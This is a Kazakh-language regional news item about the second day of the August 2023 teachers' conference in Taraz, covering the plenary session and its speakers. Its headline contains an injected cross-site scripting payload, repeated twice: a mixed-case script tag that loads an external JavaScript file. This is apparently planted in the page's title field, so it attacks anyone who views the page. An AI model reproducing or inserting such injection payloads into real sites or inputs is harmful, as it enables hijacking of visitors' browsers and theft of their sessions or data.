24-25 тамыз күндеріне жоспарланған тамыз конференциясының екінші күні онлайн пленарлық отырысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.08.2023

24-25 тамыз күндеріне жоспарланған Жамбыл облысы Тараз қаласындағы  тамыз конференциясының екінші күні онлайн пленарлық отырыспен басталды. Бірыңғай республикалық пленарлық сессияның ресми бөлімін Қазақстан Республикасы Оқу-ағарту министрі Бейсембаев Ғани Бектайұлы ашты. Пленарлық сессияның  ресми бөлімінде Қазақстан Республикасы Премьер- министрінің орынбасары Дүйсенова Тамара Қасымқызы  білім беру саласы қызметкерлерінің республикалық тамыз кеңесіне қатысушыларына Мемлекет басшысы Қасым-Жомарт Тоқаевтың құттықтау хатын оқыды.  Видеобайланыстан соң Жамбыл облысының әкімі пленарлық отырысты жалғастырды. ҚР оқу-ағарту министрлігінің Білім беру саласындағы сапаны қамтамасыз ету комитеті төрағасының орынбасары Мелдебекова Майра Тұрғанбайқызы білім сапасын бағалаудың ұлттық жүйесі туралы айтып өтті. Республикалық тамыз кеңесі аясындағы секциялардағы жұмыс кәсіби қарым-қатынасқа, педагогтердің озық тәжірибесімен алмасуға, еліміздің әртүрлі өңірлерінің педагогтері арасындағы байланысты нығайтуға және заманауи озық педагогикалық тәжірибелерді таратуға ықпал етті. 

Просмотров: 292


Пікір қосу



Деректерді қолтаңбаға қосу